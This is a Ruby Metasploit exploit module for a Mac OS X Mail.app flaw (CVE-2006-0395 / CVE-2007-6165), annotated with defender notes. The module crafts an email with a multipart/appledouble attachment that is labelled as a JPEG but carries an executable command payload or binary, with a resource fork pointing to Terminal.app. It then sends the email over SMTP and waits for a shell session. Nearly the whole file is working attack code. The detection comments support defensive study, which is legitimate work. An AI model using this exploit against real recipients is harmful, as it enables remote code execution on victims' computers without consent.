GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/osx/email/mailapp_image_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for the Mail.app image-attachment command execution flaw
# (CVE-2006-0395 / CVE-2007-6165, see 'References' below).
#
# What the code in this class does:
#   * builds one e-mail whose single part is a multipart/appledouble container;
#   * part 1 of the container is an application/applefile (AppleDouble header)
#     part carrying Finder info, the real name and a resource fork;
#   * part 2 is declared as image/jpeg but its body is the selected payload
#     (a command string or a generated executable), sent with
#     x-unix-mode=0755;
#   * the message is handed to the SMTPDeliver mixin for delivery.
#
# Defender notes, derived from the headers and data built in #exploit:
#   * The message shape is distinctive: a multipart/appledouble attachment
#     whose data part claims image/jpeg while also carrying x-unix-mode=0755,
#     and whose decoded body is not image data.
#   * The embedded AppleDouble header decodes to include the path
#     "/Applications/Utilities/Terminal.app" and the marker "usro"; an
#     "image" attachment whose resource fork names Terminal.app is a strong
#     indicator for mail-gateway or forensic review.
#   * Per the module description the affected client is Mail.app on
#     Mac OS X 10.5.0 (and 10.4 before its March 2007 fix); patching the
#     client is the remedy.
class MetasploitModule < Msf::Exploit::Remote
  # NOTE(review): ManualRanking presumably reflects that success depends on
  # the recipient's actions rather than on the module alone - confirm against
  # the framework's ranking definitions.
  Rank = ManualRanking

  #
  # This module sends email messages via SMTP (SMTPDeliver mixin); the EXE
  # mixin provides generate_payload_exe, used for the binary targets.
  #
  include Msf::Exploit::Remote::SMTPDeliver
  include Msf::Exploit::EXE

  # Registers the module metadata (name, description, references, payload
  # constraints and targets) with the framework.
  #
  # @param info [Hash] caller-supplied metadata merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Mail.app Image Attachment Command Execution',
      'Description' => %q{
        This module exploits a command execution vulnerability in the
        Mail.app application shipped with Mac OS X 10.5.0. This flaw was
        patched in 10.4 in March of 2007, but reintroduced into the final
        release of 10.5.
      },
      'License' => MSF_LICENSE,
      'Author' => ['hdm', 'kf'],
      'References' =>
        [
          ['CVE', '2006-0395'],
          ['CVE', '2007-6165'],
          ['OSVDB', '40875'],
          ['BID', '26510'],
          ['BID', '16907']
        ],
      # Passive stance: the module only delivers a message; it does not
      # connect to the target host itself.
      'Stance' => Msf::Exploit::Stance::Passive,
      'Payload' =>
        {
          'Space' => 8192,
          'DisableNops' => true,
          # No bad characters are declared; the payload is base64-encoded
          # before it is placed in the MIME part (see #exploit).
          'BadChars' => "",
          'Compat' =>
            {
              # NOTE(review): the leading '-' presumably excludes the "bind"
              # and "find" connection types - confirm against framework docs.
              'ConnectionType' => '-bind -find',
            },
        },
      'Platform' => %w{ unix osx },
      'Targets' =>
        [
          # Target 0: the attachment body is a command payload.
          [ 'Mail.app - Command Payloads',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'PayloadCompat' => {
                'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
              }
            }
          ],
          # Targets 1 and 2: the attachment body is a generated executable
          # for the named architecture.
          [ 'Mail.app - Binary Payloads (x86)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mail.app - Binary Payloads (ppc)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
            }
          ],
        ],
      'DisclosureDate' => '2006-03-01'
    ))

  end

  # Always returns false.
  # NOTE(review): presumably this opts the module out of automated module
  # selection - confirm against the framework's autofilter contract.
  #
  # @return [Boolean] false
  def autofilter
    false
  end

  # Builds the AppleDouble e-mail described in the class comment and sends it
  # through the SMTPDeliver mixin. Reads the SUBJECT, MAILTO and MAILFROM
  # datastore options; returns after printing a status line.
  def exploit

    # Only one extension is listed, so the random pick always yields 'jpg'.
    exts = ['jpg']

    gext = exts[rand(exts.length)]
    # 5 random letters + ".jpg" = 9 bytes, the same length as the
    # "Heise.jpg" placeholder that is substituted in the resource fork below.
    name = rand_text_alpha(5) + ".#{gext}"
    # NOTE(review): `data` is assigned here but not read anywhere else in
    # this method.
    data = rand_text_alpha(rand(32)+1)

    # Outer message: default MIME headers, subject from SUBJECT (random text
    # when unset), recipient and sender from MAILTO / MAILFROM.
    msg = Rex::MIME::Message.new
    msg.mime_defaults
    msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
    msg.to = datastore['MAILTO']
    msg.from = datastore['MAILFROM']

    # Inner container: multipart/appledouble, displayed inline. This content
    # type is one of the observable markers of the crafted message.
    dbl = Rex::MIME::Message.new
    dbl.header.set("Content-Type", "multipart/appledouble;\r\n boundary=#{dbl.bound}")
    dbl.header.set("Content-Disposition", "inline")

    # AppleDouble file version 2
    # 3 entries - 'Finder Info', 'Real name', 'Resource Fork'
    # Real Name matches msf random generated 5 character name - (I cheated ala gsub)
    #
    # The blob below is the base64 form of that AppleDouble header. It decodes
    # to include the real name "Heise.jpg", the path
    # "/Applications/Utilities/Terminal.app" and the marker "usro".

    resfork =
      "AAUWBwACAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAJAAAAPgAAAAoAAAADAAAASAAAAAkAAAACAAAA\r\n" +
      "UQAABToAAAAAAAAAAAAASGVpc2UuanBnAAABAAAABQgAAAQIAAAAMgAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQA\r\n" +
      "AAAlL0FwcGxpY2F0aW9ucy9VdGlsaXRpZXMvVGVybWluYWwuYXBwAOzs7P/s7Oz/7Ozs/+zs7P/s\r\n" +
      "7Oz/7Ozs/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/5ubm/+bm5v/m5ub/5ubm/+bm\r\n" +
      "5v/m5ub/5ubm/+bm5v/p6en/6enp/+np6f/p6en/6enp/+np6f/p6en/6enp/+zs7P/s7Oz/7Ozs\r\n" +
      "/+zs7P/s7Oz/7Ozs/+zs7P/s7Oz/7+/v/+/v7//v7+//7+/v/+/v7//v7+//7+/v/+/v7//z8/P/\r\n" +
      "8/Pz//Pz8//z8/P/8/Pz//Pz8//z8/P/8/Pz//b29v/29vb/9vb2//b29v/29vb/9vb2//b29v/2\r\n" +
      "9vb/+Pj4//j4+P/4+Pj/+Pj4//j4+P/4+Pj/+Pj4//j4+P/8/Pz//Pz8//z8/P/8/Pz//Pz8//z8\r\n" +
      "/P/8/Pz//Pz8////////////////////////////////////////////////////////////////\r\n" +
      "/////////////////////6gAAACoAAAAqAAAAKgAAACoAAAAqAAAAKgAAACoAAAAKgAAACoAAAAq\r\n" +
      "AAAAKgAAACoAAAAqAAAAKgAAACoAAAADAAAAAwAAAAMAAAADAAAAAwAAAAMAAAADAAAAAwAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAQAAAAUIAAAECAAAADIAX9CsEsIAAAAcADIAAHVzcm8AAAAKAAD//wAAAAABDSF8" + "\r\n"

    # Decode the header, swap the placeholder name for the generated one
    # (same byte length, so the rest of the decoded header is unchanged),
    # then re-encode as CRLF-wrapped base64.
    fork = Rex::Text.encode_base64( Rex::Text.decode_base64(resfork).gsub("Heise.jpg",name), "\r\n" )

    # Random Content-Id for the data part.
    cid = "<#{rand_text_alpha(rand(16)+16)}@#{rand_text_alpha(rand(16)+1)}.com>"

    cmd = ''

    # The data part body is the base64 of either the encoded command payload
    # (ARCH_CMD target) or a generated executable (x86 / ppc targets). In
    # both cases it is not image data, despite the image/jpeg label below.
    if (target.arch.include?(ARCH_CMD))
      cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")
    else
      bin = generate_payload_exe
      cmd = Rex::Text.encode_base64(bin, "\r\n")
    end


    # Part 1: AppleDouble header (application/applefile).
    dbl.add_part(fork , "application/applefile;\r\n name=\"#{name}\"", "base64", "inline;\r\n filename=#{name}" )
    # Part 2: declared image/jpeg with x-unix-mode=0755. The transfer-encoding
    # argument also carries an extra "Content-Id" header line after a CRLF.
    # The image/jpeg + 0755 combination is a useful filtering signature.
    dbl.add_part(cmd , "image/jpeg;\r\n x-mac-type=0;\r\n x-unix-mode=0755;\r\n x-mac-creator=0;\r\n name=\"#{name}\"", "base64\r\nContent-Id: #{cid}", "inline;\r\n filename=#{name}" )

    msg.parts << dbl

    # Deliver through the SMTPDeliver mixin.
    send_message(msg.to_s)

    print_status("Waiting for a payload session (backgrounding)...")
  end
end